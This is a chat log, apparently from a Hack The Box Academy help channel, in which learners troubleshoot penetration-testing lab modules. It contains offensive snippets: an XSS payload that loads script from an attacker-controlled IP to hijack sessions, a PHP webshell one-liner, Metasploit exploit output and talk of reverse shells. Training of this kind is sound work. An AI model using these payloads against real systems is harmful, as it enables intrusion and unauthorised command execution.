#modules

No worries 😉

<@&861185840277487616>

there's a problem in windows privsec -> Interacting with Users section the responder command given "sudo responder -wrf -v -I tun0" throw en error saying "./Responder.py: error: no such option: -r" i had to change it to something like this to work for me "sudo responder -wrf -v -I tun0"

not sure if even my command is correct but it worked

what was it

Don't worry about it

i worry about all of you

we are one big family

come on, enlighten me

https://tenor.com/view/the-simpsons-homer-simpson-nothing-to-see-here-simpsons-bush-gif-16295909

i guess thats the first thing il ask god when i move on

"what was that thing on nov 17th 2024?"

i need help. I am on Footprinting medium. I have the credentials for sa and alex and i have tried logging into the administrator with the creds and it doesn't work i have enumerated SMB and all of its shares that i have been able to find, Ihave tried enumerating rpc with no luck, i have also gained access to the machine via rdp but can't login with the creds found

i need help please**

lol

the creds should work

did you try launching the program as admin

im going insane

i mis saw letters as different letters

Is it possible to kick yourself in the head

if i saw that sooner i would've solved it in 20 minutes

Anybody done the corperate OSINT module? And if so what were ur thoughts on it

Has anyone else tried the ‘web archives’ section of the ‘Information gathering - Web edition’?

I’m really struggling to find the answers from Wayback machine. The answers for 1 and 2 (members and boxes in hackthebox.eu) are coming out wrong even though I got the webpage loaded up, and the last question for the number of pages Wikipedia had in March 2001 is impossible to say since the earliest snapshot they have is for June 2001.

Can anyone help? Thanks.

Attacking Common Applications, thick clients. Can anyone help me here?

O man this exercise just sucked. I can help you. You basically need to follow the steps from the lesson from the very beginning dont skip a step and just put the initial exe file in the debugger.

I ve been stuck here for days.... 😒The initial restart-service.exe?

It is probably because you are just getting the restart-service.exe file and opening it in the debugger. What you need to do is follow the steps. focus on this step, because it generates a new exe file that you need to import that file in the debugger.

can anyone help with linux fundamentals - filter contents? "How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)" nothing im trying is working!

in Password Attacks module, specifically in Attacking Active Directory & NTDS.dit.
I got the credentials for Question 3, but when I submit then it says wrong answer, any idea what's the problem?

try to run ss -tulnp | grep "LISTEN", see how many services are listening, it says not on localhost and ipv4 only so try to exclude any service listening on localhost and any service using IPv6.
I did not do the module but this is probably how you'd do it.

can i send my output here?

i did something similar and got the same answer so i dont really nkow

I'm not sure if this is against some rules or not honestly

can i send it to you?

yes you can

Had already run it, but running it again gave me the same size restart-service.exe so i guess it got be something else

Also since i got these 3 files , i guess that the steps so far are completed correctly?

Now that you have the NEW exe file go ahead and import it in the debugger

The new is the same as the old, check the files sizes

and yet nothing changed

The only map with RW is the heap and is not a DOS MZ exe

@blissful verge Gotta say, really frustrating exercise mister

@final shale Since i got these 3 files everything so far is ok

I would say yes

Nvm, finally got it. For those wondering: Use archive.ph if internet archive misbehaves, and directly change the date in the url because IA seems to redirect to June 11 2017 instead of June 10 even when you click correctly.

any help

you can dm with more details if you'd like

please don't add as friend, just DM

hey guys, need some help. I am in AD Enumeration & Attacks skills assessment part 2, question 9.

I have Administrator access to the MS01 host, and am trying to enumerate the user with GenericAll ACL

Using SharpHound, it is successful and able to find the answer. But when using PowerView it shows this error

At C:\Users\Administrator\Documents\PowerView.ps1:5904 char:9
+         throw '[Get-DomainGUIDMap] Error in retrieving forest schema  ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : OperationStopped: ([Get-DomainGUID...from Get-Forest:String) [], RuntimeException
    + FullyQualifiedErrorId : [Get-DomainGUIDMap] Error in retrieving forest schema path from Get-Forest```

Why when using PowerView, it shows this error?

Is the source code used in CSWH - Websocket , Section: https://academy.hackthebox.com/module/231/section/2489 available.

Anyone who has done 'Cracking Passwords with Hashcat' --> skill assessments last question's - I need to use rules here to determine what password appears the most?

Hey guys whats up? Can anyone help me with footprinting hard lab? I think there is something wrong with I dont know what. I have to ssh with the user tom which I have found already. I have already found the SSH key too. I copy paste the ssh key into my own file and chmod 600 on it and try to ssh but nothing. I get tom@10.129.202.20: Permission denied (publickey).

how are you trying to ssh with the key

ssh -i id_rsa_2 tom@10.129.202.20

likely something wrong with the key, would compare with what you found on the server

One thing I can find as a mistake is when I cat the file from vim or nano they have some whitespace around that I am not putting there. When I paste it it looks the same but then it changes. Maybe its that. Maybe not

You'll want to output results and figure out a way to count the number of times a hash is the same.

Yea I always get each value appears one, so either I missed some password, or the hashcat outputs every password once regardless of how many times It got cracked.

anyone helpme with the first task in server side attacks: Identifying SSRF. I have obviously found the open port is 3306. But literally cannot find where to go from there. dateserver=http://dateserver.htb/javascript&date=2024-01-01 doesn't give me much when i use it with burp repeater. I have tried enumerating /javascript with ffuf but that hasn't lead me anywhere

Hey, does anyone know of any Metasploit module where you just set the LHOST and LPORT, and then when you run it, it generates a powershell reverse_tcp payload for you to copy and execute on the target machine? I forgot the name of the module 💀

anyone here

msfvenom

Nah, that's to generate payloads. I'd seen the thing I'm talking about in a video, but that video was taken down 💀

It's a module and gives you the payload command to run, and then connects once you run the command in the same pane.

Also, anyone know what's wrong with my SMB map?

I am working on:
Explore the web application to identify other fields/forms that only apply front-end validation, and try to find one that suffers from 'Validation Logic Disparity'.
Then, after abusing it to obtain UNLIMITED cubes, unlock the "Intro to Academy" module and submit the flag in the first section.

How do we see the front-end validation?
How do we see the back-end validation?

In the source code I saw that if a user login with @hackthebox.com it gets UNLIMITED, but we are not allowed to change email in profile settings:

code: users-controllers.js:
// disable registering with @hackthebox.com domain
if (email.endsWith("@hackthebox.com")) {
return next({
message: "Registration with @hackthebox.com email is not allowed.",
statusCode: 422,
});
}

Can someone help me with this?

it is about what hashes you you crack and the format off it.. I have sent you a DM, if you don't have solve it ...

You can do it here https://www.revshells.com/

It is a good one!

Yeah, that's what I usually use, but I was hunting for that module specifically, just to satisfy my mind 😂

I'm trying to establish a reverse shell, got a listener set up on port 4445, but ligolo is returning this when I execute the payload. Anyone know how to resolve this?

ERRO[0715] dial tcp 0.0.0.0:4445: connect: connection refused

I've already tried different listener and proxy ports. File transfers work, it's just when I'm trying to connect back to the multi/handler Metasploit listener when executing my payload.

I'm confused, but setting my LHOST on the listener to my pivot host's IP address instead of my attack host's IP address worked? Why?

Setting the LHOST to 0.0.0.0 works too, but that makes sense since it means any IP address.

What are the cert required for doing a job as a Pentester in the US.

And what are the Salary I can expect

#careers-and-certs

working through the credential hunting in windows section of the password attacks module. i found the first two via some windows searches, but upon trying to run the third party tool suggested in the module i get a notice that says "this app cant run on your pc"

am i doing something wrong here? i tried a few versions of the exe from the github releases page and none seem to work

0.0.0.0 will listen to all your ips /interface in your local host

Nvm, i did missunderstand you

Just... Watch out for trying it under WSL in Windows

While you can route over the VPN, you cannot bind to your VPN client IP within it by default

Might be a way to do it.. will have a browse

I mean, you could connect to the VPN from within WSL

But I'm talking of if you have OpenVPN connected on your Windows host, and try listening for a callback from within WSL

@ocean night you are from HTB ?several times had problems with connecting via reverse shell on targets in different modules. in some cases it doesn't work, others don't, heard others with dust problems, seems to be npgot when we run vis vpn frpn our own machines this happens, is it a known problem?

I am, but I can't generally provide support regarding content I'm afraid

If it's regarding the most recent machine, there was an issue, and an initial patch has gone out for it recently

Och i see.. it was a out different machines on different days.. thanx anyway

It looks like you might be able to expose your VPN IP from Windows to WSL with some routing and forwarding enabled

but tbh.. if you want to use the VPN from within WSL, just use the client from within WSL 😅

can someone explain this?

Looks like a GR character set? maybe?

Dont get it, what even use wsl at all, use a vm or just install some distro.. 🙂

I love WSL 🙂

i have given an encoded text and i need to decode it

Change to the decode tab?

i think its first encoded with base64 than url

Ppll are different 😄

https://academy.hackthebox.com/module/110/section/1052

yeah i was doing that

first i decorded it to base64 and then url decode but the url decode is same as base64 after first decode

i dont get it

Try again?

..and by that, I literally mean.. try again

tried multiple times

How did you decode ?

Read the question @eager zinc

The hint you need is there

It's a Tier 2 module mind, so no solutions here please 😉

yeah sry but idk why im unable to understand the hint

You're close

Dont give up:)

YESSSS! xfreerdp is not working!!!! However, rdesktop with specifying local domain worked. Thanks so much guys!!!!!👍

fixed

i think url decoding didnt work in zep

Look at the difference between a URL encoded string, and a Base64 encoded string

You got this

i got decorded it using other tool but coudnt do on zap owasp

idk y

Bumping this question.

Just wondering if you need to be in UNI to get the student plan on htb academy?

Would High school/middle school qualify?

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription
you can reach out to support for clarification

gotcha fs fs

how do you get cpts in middle school

wow you must be really smart

do you know how to get bridged network for wsl?

by being a grinder 🤑🤑🤑🤑🤑🤑🤑🤑

sigma grinding

No I was just asking for someone else 😭

Anyone available for #modules message

do you mean to get student pricing?

Nah I was asking if a highschooler/middle schooler is able to get the student plan for someone else thats all 🙂

i'd think the status of the person signing up at the time is what counts. If you're a student but you want to get student pricing for your dad, probably not a thing...if i'm understanding what you're asking correctly

damn bro just exposed himself

I think, however, that he meant that he asked for someone else, not that he someone else should get it through him

Just Google:)

You could try web_delivery 😉 its one of my favorites . In this example I am using a meterpeter payload, but I'm pretty sure your payload would work too

PDF web application in Final Assessment of Modern Web Exploitation Techniques module is not working properly.
Even while following the steps mentioned in Explanation I am getting Internal server error

Is the htb academy where I can start learning about black box? Im most likely going to have a black box test pretty soon and I need to learn about it ASAP, but I dont really know where to start

a test? like an exam?

Yeah a really important one

i'm in Intro to Network Traffic Analysis, Page 11, Familiarity With Wireshark. I've downloaded the pcacp and opened it within Wireshark. I get this message when i click on any of the interfaces from the home screen, not to mention env3 is never mentioned in the modules, usually eth0 or something else

well if you dont have prior knowledge im guessing it'll be an easy one

do a couple of htb boxes and you're good

Not at all

hows that

Its not for school and I know a ton of terms, but I have never actually put it into action

thats why im recommending htb boxes

easy ones

i dont do boxes myself but ig you'll do great, follow the writeups you find while googling

👍

alr ill try, ty

$ tcpdump -i ens3
tcpdump: ens3: You don't have permission to perform this capture on that device
(socket: Operation not permitted)

Attacking Common Applications
Exploiting web vulnerabilities in thick client applications

So...I modified the Invoker and the ClientGUI thingy, compiled it and made the traverse jar, instead of doing it 1 by 1 and taking time.

For some reason, the .jar displays the content of the file instead of downloading it. I have used the 1:1 script provided in the module, anyone got an idea what could be the issue?
If someone is down, I can even stream my actions 1 by 1 to see what's wrong, but I am stuck for about 2+ weeks on that.

dang DACL Attacks II Skill Assessment was a rough one. Finally got through it. Took me longer than all the other Skill Assessments in the new path

run as root

when i'm in the wireshark gui, i get the same permissions error, any idea what i can do there similar to how i can use sudo on the command line?

if that question is incoherent thats because i just got here 🙂

launch wireshark as root

when i'm in the pwnbox, i click the icon to open the wireshark gui, how would i open that as root? is there a way through the command line to start up the gui as root?

sudo wireshark

in terminal

$ sudo wireshark
Authorization required, but no authorization protocol specified

** (wireshark:128356) 16:29:36.665846 [GUI WARNING] -- could not connect to display :1
** (wireshark:128356) 16:29:36.666008 [GUI ERROR] -- This application failed to start because no Qt platform plugin could be initialized. Reinstalling the application may fix this problem.

Available platform plugins are: eglfs, linuxfb, minimal, minimalegl, offscreen, vnc, wayland-egl, wayland, wayland-xcomposite-egl, wayland-xcomposite-glx, xcb.

Aborted
😢

$ wireshark does open the program

strange

ig wireshark wants access to your users display

but since you’re using sudo the root user doesn’t have access to your root environment

might be wrong

this is my first time using wireshark so all foreign to me, i'm in the Intro to Network Traffic Analysis module

you need to let the root user have access to your display

chat gpt
xhost +SI:localuser:root
localuser:root being added to access control list
┌─[us-academy-5]─[10.10.15.110]─[htb-ac-1577473@htb-fp9v5lwpgr]─[~]
└──╼ [★]$ sudo -i

root@htb-fp9v5lwpgr:~# sudo wireshark
** (wireshark:136568) 16:34:46.519097 [GUI WARNING] -- QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/runtime-root'
This did open wireshark

but i get the feeling i did a weird workaround to get it to work

still getting the "do not have permissions to capture" messages

no

when you’re using a computer with a gui the windows that appear on your display is controlled by something called the x server

in linux this display is referred to by an identifier :0 :1 and it’s the environment applications draw their interfaces

so when you a gui app it needs to talk to this display to know where to put all it’s pretty pictures

and when you slap sudo on a command you’re switching users from you (who has access to the display) to root who doesn’t because root doesn’t inherit your environmental variables unless explicitly told to do so

interesting

so wireshark running as root fails to find a display to connect to and fails, the result in the above error you sent

is xhost +SI:localuser:root something i will be using often in the future?

or is there another way to give root the environment

if you’re running gui apps with sudo which you really shouldn’t then yes you would have to deal with this every time because sudo doesnt preserve display access unless you explicitly configure it to

yes

earlier you seemed surprised that I had to even do this, is there something i might've done to cause this? maybe a reset of the machine would help?

try this sudo -E wireshark

that worked, no more error messages

also whenever i start up a new Pwnbox, i like to make this adjustment to the shortcut:

i think part of my struggle was, once i followed instructions to SSH into a target, i wondered how i got the wireshark on my local machine to work on the machine I just entered. Only now realized i had to start wireshark inside the target

now i see the ENS224 i didn't see earlier, had only seen ens3

yes the -E flag

preserves env vars

this will stop sudo from creating a bridge between root user and normal user

Hi everyone!

Sorry that I'm messeging there now I'm review pro lab and making writeup for myself Pro Lab (Rastalabs) I logged in with credentials ||rastalabs\S......r2020 ||to OWA but now when I try with this I have an error can you please refer me what I would do?

#welcome verify your acc

Then ask in the correct channel

@west canopy You were actually correct. From home I had no issue, but from work the issue persisted (which was weird as it was outgoing requests not incoming ones). Thank you very much for this 🙂

ah that makes sense. Many companies use proxies for outbound traffic.

Is there a problem with the first web enumeration module that uses: https://www.inlanefreight.com/ on 10.10.10.121? Using the web based workstation the site doesn't load when browsing via the internal IP. The DNS settings are 1.1.1.1band 8.8.8.8. If anyone has got any ideas I would be grateful. I did the IP to the hosts file to see if that would work unfortunately it did not. This relates to this module: https://academy.hackthebox.com/module/77/section/728

Scroll down to the bottom of that section and the target IP:PORT will be provided after you click on "Click here to spawn the target system!". Also inlanefreight.com from is reachable from a browser and does not use 10.10.10.121.

Thank you. I was using following the initial instructions where 10.10.10.121 was used. That Is why I expected to be able to browse to it from the box. After the target was spawned I can get to the HTB blog page.

Hello, is that normal that ffuf takes a while when performing subdomain & vhost brute forcing (on inlanefreight.com & academy.htb for the Attacking Web Applications with Ffuf module)

yes\

but why ? When I do the questions with gobuster and wfuzz which I prefer, it is really fast

no. took me 249ms to finish vhost enum with ffuf.

Yes I finally manage to solve it. The issue was coming from my network I guess. Thank you

LLMNR/NBT-NS Poisoning - from Linux module question: Crack the hash for the previous account and submit the cleartext password as your answer. I am having issues cracking with hashcat and/or John. I use -m 5600 but still get either haschat not found or seperator unmatched. I used the hash for the user from 1st question. I tried from my terminal and academy terminal as well. Any guidance would be appreciated for this one.

I have a zip file，named flag.zip

It has a png file named what's this.png and a flag.txt

hashcat not found? how are you running it? sounds like it's not installed. if you're running it from a folder use .\hashcat.exe instead of just typing hashcat

How to open it

sorry, not hashcat, hash not found

No hints

you run hashcat and instead of hashcat running it says "hash not found"? verbatim what does it say

I can't extract with binwalk -e

unzip it?

it has password

This question has three levels. The first level is dictionary blasting, and the second level is mask attack. I am stuck at the last level.

there is no hints

would really help if you mentioned the module and section

otherwise i'd say crack it

just ran it again. i didnt have a file path right, but..i still get errors.: Watchdog: Temperature abort trigger set to 90c

clCompileProgram(): CL_COMPILE_PROGRAM_FAILURE

error: unknown target CPU 'generic'

• Device #1: Kernel /usr/local/share/hashcat/OpenCL/shared.cl build failed.

There are 'What's this.png' and a'flag.txt' in zip

Hey guys!
https://academy.hackthebox.com/module/54/section/490

I have added the IP to my /etc/hosts file. When I browse through academy.htb:port, i can see the response. But, when I do admin.academy.htb:port it going into load mode forever.

Did you add the subdomain to your hosts file?

no, let me do that

are you using cpu or gpu cracking? maybe try it in Windows with the Windows version of hashcat. it's not recognizing your CPU.

thank you

https://www.kali.org/docs/general-use/install-nvidia-drivers-on-kali-linux/ or you can install the CUDA cores on Windows and do it with your GPU there

Thanks. I'll look into this and keep pushing.

Bruh the skill assesment for ffuf module takes lot of times to properly perform the fuzzing it's crazzy you didn't joke with this one

i think i ran like 3-5 ffuf processes to make it go faster

iirc ffuf support threads

you can alse use feroxbuster and gobuster

i love feroxbuster.. but they're on the attacking with ffuf module so.. probably should use ffuf haha.

I think this might be it. I must've just configured it incorrectly when I tried the payload yesterday. Thanks!

yeah I found it on 0xdf writeups ,ffuf can do the job tho

hello everyone i need some help with the encoding/decoding part of the web proxies module https://academy.hackthebox.com/module/110/section/1052, the hint says use base64 and url encoding, i've tried that, and the reverse order. Didnt work. Am i missing something?

Downloaded the file and it is just what the hint suggests.

Something to keep in mind is you can encode something with the same encoding multiple times. Play around with it or if you know of a swiss army knife, use it.

thanks, i figured it out with this solution was pretty crazy tho. if it wasnt for the hint i might have never figured it out. I assume by the swiss army knife you mean the smart decoder in burpsuite? I tried using it but it didnt do anything

My hint was not within Burp.

gotcha

You can DM and I will tell you what to check out.

I am in the same boat. Any hints on what we are missing? The root flag is not working.

I got stuck in windows lateral movement module , winrm section

Im at the last part where i have to get connect to dc01 as leonvqz used and get the flag

I rdp using pth with user leonvqz on srv02 but not able to pssession on dc01

“Completed”

is the script for xss session hijacking correct?

tried redoing it a few times

or am i missing something obvious

that's not a script but you're running a php server, looks like the server worked

yeah thats the output

so module is ment to walk you through session hijacking with xss script

im trying it on local vm to see if it's a pwnbox thing atm

what module and section

Cross-Site Scripting (XSS)
Session Hijacking

i presumed there script would of worked, but getting that unsupported sll request error

your php command is correct, not sure what you're doing on the other end

||<script src=http://IP:8000/script.js></script>||

thats what im running in the fields

tough to say without knowing more.. make sure your payloads are right and the contents of script.js it should work

Hello everyone! I'm having a little trouble with the Metasploit Module.

[*] 10.129.174.211:445 - Target OS: Windows Server 2016 Standard 14393
[*] 10.129.174.211:445 - Built a write-what-where primitive...
[+] 10.129.174.211:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.174.211:445 - Selecting PowerShell target
[*] 10.129.174.211:445 - Executing the payload...
[+] 10.129.174.211:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.```

Can I edit the timeout?

make sure you have configured your listening host address correctly

your LHOST is wrong

I'm supposed to set the LHOST as my own IP which I can check with ifconfig, yes?

your tun0 IP

the one that yknow is assigned when you connect to the VPN

:)

AAAAAH

theres a tiny mistake in the Creepy Crawlies module the wget command -0 doesn't exist cause its actually a capital O

Now answer me this? Why am I not smart?

Not knowing something doesn't mean you're not smart. You're smart enough to know that you don't know something and have room for improvement.

#1234357888114364508

https://tenor.com/view/we-all-cant-be-geniuses-brandon-the-ms-pat-show-not-everyone-can-be-a-genius-not-everyone-can-be-as-brilliant-as-me-gif-22509788

😩

I think you are smart, you have been learning about hard stuff, i think you are young, it takes time to get knowledge, things like this is not easy! You will get it, i promise!

Maby try with different wordlists or add some rules/mask in your enumartion

My bro I'm 33, I think I'm just mentally challenged hahahaha

But I like learning at least

@night hollow this is not a channel/server to sell stuff.

Best to ask in #careers-and-certs , if you can't access this channel, read #welcome and follow instructions

Hehe, sorry Bro! 🙂

Hi, I am unable to connect using SSH in the following question. It's from Intro to Command Line Module. I am using the password from the previous question but it gives me error of 'permission denied'. Am I doing something wrong? Thanks.

Don’t run kali as root

And why are you using sshpass? Just use ssh

ssh user9@10.129.204.9

I know what I am doing. Don't worry.

It's not getting in the way. The problem is something else. Have tried with only ssh too but same error. It's just personal preference to use sshpass.

Clearly not lol

If you have nothing better to add please stop talking. You're not helping at all.

It says there’s no password

i want to set payload processing to hex encode, but its not there?

tried that already, even reset the machine.

Are you connected to the vpn?

You can laugh but there’s plenty of people that don’t do that and then wonder why it doesn’t work

he is indeed connected to the VPN as otherwise the SSH connection banner won't be shown

however, he also needs to carefully revisit the details in the question

To me it seems he tries to connect using user8 and a pass

While he needs user9 with no pass

the passwords for the users are intentionally left out in the questions as it is part of the assessment to be found

Ah I see

Am not familiar with the module

You find it in the section before, and then get to the next or something?

You gradually find the passwords for the next user by solving the questions

Your user is "user8" and in the question they say "user9"

Meaby is that

I see, so he isn’t at user9 yet?

that's the thing, he needs to carefully go through the question and the details it has

Sorry not reading above

Now i get it

So, it means I need to find out the password for user9 using user8 apparently.

but in the previous questions I have been using the flags as the passwords and the hint was the same as " " and they worked. Maybe it's different in this question.

nothing different

it is the same style/expectations across all questions

For example, in this question, I used the user7 flag for user8 even though password is " ". So I was following the same pattern but it didn't work for user9.

take a break and try again

I don't know where exactly to ask this question so I'll just ask here.
anyone knows when will Season 7 start?

Hello everyone! Can someone help me with graphql skill assessment!! I find usernames, id, apikeys, but not flag. I stuck

try to locate a vulnerability within one of the functionalities

how important footprinting module is?

Thank you, I actually found the vuln and I found flag at last very fun module

Trying to import SeBackUpModule for this module section(https://academy.hackthebox.com/module/67/section/601)

But it isn't working for me(unlike in the module section lecture)

I ran as adminstrator in Powershell too:

• Import-Module .\SeBackupPrivilegeUtils.dll

•   + CategoryInfo          : ResourceUnavailable: (.\SeBackupPrivilegeUtils.dll:String) [Import-Module], FileNotFound
   Exception
    + FullyQualifiedErrorId : Modules_ModuleNotFound,Microsoft.PowerShell.Commands.ImportModuleCommand
  
  

PS C:\Users\Administrator> whoami /priv

PRIVILEGES INFORMATION

Privilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
PS C:\Users\Administrator> Set-SeBackupPrivilege
Set-SeBackupPrivilege : The term 'Set-SeBackupPrivilege' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:1

• Set-SeBackupPrivilege

•   + CategoryInfo          : ObjectNotFound: (Set-SeBackupPrivilege:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundExce

file not found

I see now I need to be in the tools directory:

S C:> Get-ChildItem -Path C:\ -Recurse -Filter SeBackupPrivilegeUtils.dll -ErrorAction SilentlyContinue

Directory: C:\Tools

Mode LastWriteTime Length Name

-a---- 5/6/2021 12:54 PM 16384 SeBackupPrivilegeUtils.dll

Or use the full filepath

Hello everyone, I have a problem using nmap and was wondering if someone has a explanation. I am doing a module and in the module they are multiple boxes, I am using nmap to sweep ping the network through a ligolo-ng proxy.

For some reason if I use nmap -PE -sn 172.16.1.11 or nmap -PE -sn 172.16.1.13, nmap tells me that the hosts are up, but if I try nmap -PE -sn 172.16.1.1-15 it tells me that 0 host is up.

I dont understand why is that.

i believe that on the ligolo-ng page caveats section there is a warning about nmap like false positives

hmmm just reading your question again

you seem to be pinging different hosts

im coming back to this question just to answer my concern

picture at the bottom

This image also shows an example of several GPOs being linked to the Corp OU. When more than one GPO is linked to an OU, they are processed based on the Link Order. The GPO with the lowest Link Order is processed last, or the GPO with link order 1 has the highest precedence, then 2, and 3, and so on. So in our example above, the Disallow LM Hash GPO will have precedence over the Block Removable Media and Disable Guest Account GPOs, meaning it will be processed first.

My question i have is at the end of the line it says "meaning it will be proccessed first" if this refering to the Disallow LM Hash GPO it wouldnt make sense since this has link orer 1 (highest precence) but if "meaning it will be proccessed first" is refering to Block Removable Media and Disable Guest Account GPOs it makes sense.

sorry words are confusing but question is "meaning it will be proccessed first" is refering to what group policy?

from my understanding its:
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)

can you please provide the module ? I am curious about that behaviour too and would like to run some tests when I get to it

actually this does seem odd

Sure, here it is : https://academy.hackthebox.com/module/115/section/1139

If you add -vv or --packet-trace iirc you should see the packets sent

I saw the warning that is why I am using -PE

Could try that you are right, gonna test it.

if you figure it out and can spare the time, please let us know, still curious

any help here please?

Hi I'm stuck in RFI in the File Inclusion Module. I've created the php shell and started an upload server in the same directory. After including my ip adress and command I get the following error message:

<b>Notice</b>:  Undefined index: cmd in <b>http://10.10.14.3/shell.php?cmd=id</b> on line <b>1</b><br />
<br />
<b>Warning</b>:  system(): Cannot execute a blank command in <b>http://10.10.14.3/shell.php?cmd=id</b> on line <b>1</b><br />
<br />
<b>Notice</b>:  Undefined variable: p2 in <b>/var/www/html/index.php</b> on line <b>48</b><br />

Here you can see that the shell is accessed:

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.231.123 - - [19/Nov/2024 15:17:30] "GET /shell.php?cmd=id HTTP/1.0" 200 -

command should be in url?

Its in the error. Youre using some undefined p2 variable in your file (I guess). Check you included code

It's referring to disallowing the lm hash

Ordering is top-down

It's literally a basic php webshell:
<?php system($_GET["cmd"]); ?>

doesnt highest precedence mean processed last?

a GPO attached to a specific OU would have "precedence over" a GPO attached at the domain level because it will be processed last and could run the risk of overriding settings in a GPO higher up in the domain hierarchy. 

whats the file name is it shell.php or shell.php?cmd=id

shell.php

That's referring to something else

Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)

is this correct tho

No

okay understood its the other way around

Ok nvm i got it

i can vc and we can do it need a break anyways

have to use & instead of ?

ayt all good

thanks for your help

The "precedence" in quotes is just to say the more specific it has to be, the later it will be processed

Just to make it clear the GPO with the highest precedence in a tree will be the one at the last OU.

but when it comes to multiple GPO in a OU then its like a firewall rule link order 1 is done first link order 2 then 3 so bassiclly this

Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)

is actually the opposite with Disable Guest Account overriding the settings?

am i correct?

Yes

Hi all,

I’m preparing for the CPTS exam, and I have a question about reporting. Suppose I encounter an FTP anonymous login, but there are no files present. Would this still be considered a finding? If so, would it be categorized as low or informational? When I use the CVSS 3.1 calculator, I get a score of 0.0, which would suggest it’s informational, but in the course, they mention it as low. What do you all think?

You'll need to use best judgement

Because it depends what's accessible via login

Hi ! I'm having trouble figuring out DNS's in Footprinting - DNS Enumeration. I kinda understand zone transfering, and records, configurations. However, i'm lost when it comes to enumeration. Let's say dig's axfr returns 5 A records. One of them is also axfr-able. When automating this process with gobuster for example, it finds 3 out of 5 A records, and seemingly not the axfr-able one.
I've been reading the module up and down, and can't figure out the relationship of zones. Some seems unscannable, or unreachable. Do you have material that can help me have a grasp on this ?

In this case it was only a flag and nothing that got me into the network or other userfull information

https://www.cloudflare.com/learning/dns/glossary/dns-zone/

Thanks didn't see that one :))

Hey everyone, I am on module/77/section/843, I ran nmap and found the target box is running an outdated version of Apache, found multiple vulnerabilities in Searchsploit, but how do you turn Searchsploit results into a Metasploit attack?

In msfconsole search apache 2.4.41

I tried that earlier 😕

is it case sensitive?

Maybe?

Idk it also helps to give module and section name

Not the endpoint

Because I'm on mobile so copy/paste the endpoint is difficult

Module "Getting Started" section "Public Exploits"

the instructions just tell you to go to msfconsole "search exploit eternalblue"

Oh

Lmao

Visit the webpage

I've narrowed down my initial questions about DNS records and zones. dig axfr finds 5 A records, gobuster enumeration finds 3 (with curated wordlist). How can a DNS A record be invisible to gobuster ?

There's a simple-backup directory but it's empty

Use that as a narrow focus for your search

The plugin name is right there to search for

ah found something on rapid7, thx

Are all 5 names in the word list?

on nmap course it says -sn disables port scanning, y woud u wan do that

If you're scanning for active hosts

so u can only do one or another? not both?

You can do both

It just takes more time

oh true

does it also make u more traceable?

Lmao if that's what you're worried about gtfo xD

Packets need to be sent and received for nmap to give results

Yes. Also the only two that gobuster finds are on the same subnets. The A records to find are on other subnets (based from dig axfr's)

In the same subnet?

Can i disclose IPs of the module ?

sure

Dig's axfr

app.inlanefreight.htb.  604800  IN      A       10.129.18.15
dev.inlanefreight.htb.  604800  IN      A       10.12.0.1
internal.inlanefreight.htb. 604800 IN   A       10.129.1.6
mail1.inlanefreight.htb. 604800 IN      A       10.129.18.201
ns.inlanefreight.htb.   604800  IN      A       127.0.0.1

Gobuster

Found: ns.inlanefreight.htb [127.0.0.1]
Found: app.inlanefreight.htb [10.129.18.15]
Found: mail1.inlanefreight.htb [10.129.18.201]

y

just wanted to let you know that i was right about
Disable Guest Account -> Block Removable Media -> Disallow LM Hash (with this GPO potentially override settings)
and its not the otherway around meaning link order 1 is applied last and will override

https://youtu.be/nVglVO39oLk?si=q81Kjp3kQDcp01wL

I don't know exactly what GoBuster does for a query, but the result is correct from my point of view

Seems like Gobuster can't find anything if I make it start fuzzing from this very invisible zone. Do you know some robust tool that can enumerate zones and query axfr and the same time iterating through "leaves" ? Thanks anyway for the help appreciate it :))

If a zone transfer works, why do you want to use other tools? If the zone transfer works, you will get all the data

There's also specific tools for dns bruteforcing

Manual enumeration works fine for zone transfers but I think I need automation to scan for subzones/subdomains to find a specific host. I was asking this because from my point of view gobuster cannot find a particular zone

i'll have a look and test them all haha :))

You'll get introduced to them in the modules

who can help me in nmap

Remember that zones can and should be configured so that only certain servers are allowed to transfer zones

so i did ssh root@ <ip> on nmap and it asked me to continue

i typed yes and now its tripping

i'll hold on to this thanks

is there a network issue today? I have been running through the skills assessments on attacking common services, nmap scans have been taking longer than usual and on the attacking smtp I had to restart the box to get the telnet to connect? on the hard lab my nmap is currently at about 40 minutes

Attacking Common Applications - SA 2 - Last question Find the flag.

Got the rev shell as www-data but have trouble pirv esc any tips ?

Tried all the exploits suggested from local_exploit_suggester, nothing worked.

sudo -l give me no passwd for php but after launching bash i still am www-data

Any tips??

I think I went a different way to you, there are multiple ways from what I can see in the forums are you asking about the medium one or hard just to clarify?

Medium one

ignore me, I am on different module my bad I am on attacking common services. sorry., but maybe try gtfobins? if you havent already

#boxes for non-academy boxes

Hi Ive been following the steps outlined in this module section (https://academy.hackthebox.com/module/67/section/603) and I cant understand why I continue to get this access denied error:

The question: " Leverage membership in the DnsAdmins group to escalate privileges. Submit the contents of the flag located at c:\Users\Administrator\Desktop\DnsAdmins\flag.txt"

@fathom pendant care giving a hand?

Hi I’m new to cybersecurity and I have no sort of idea where to even start what would be the best way for me to start with no previous knowledge

Have you joined the Academy if not do it and do the modules in the beginning path.. it is good to have some basics in Networking, Linux, Windows command-line / terminal ) some knowlage about scripting with bash and pthon is good for ya 2

do i need to know all that before doing the moduels]

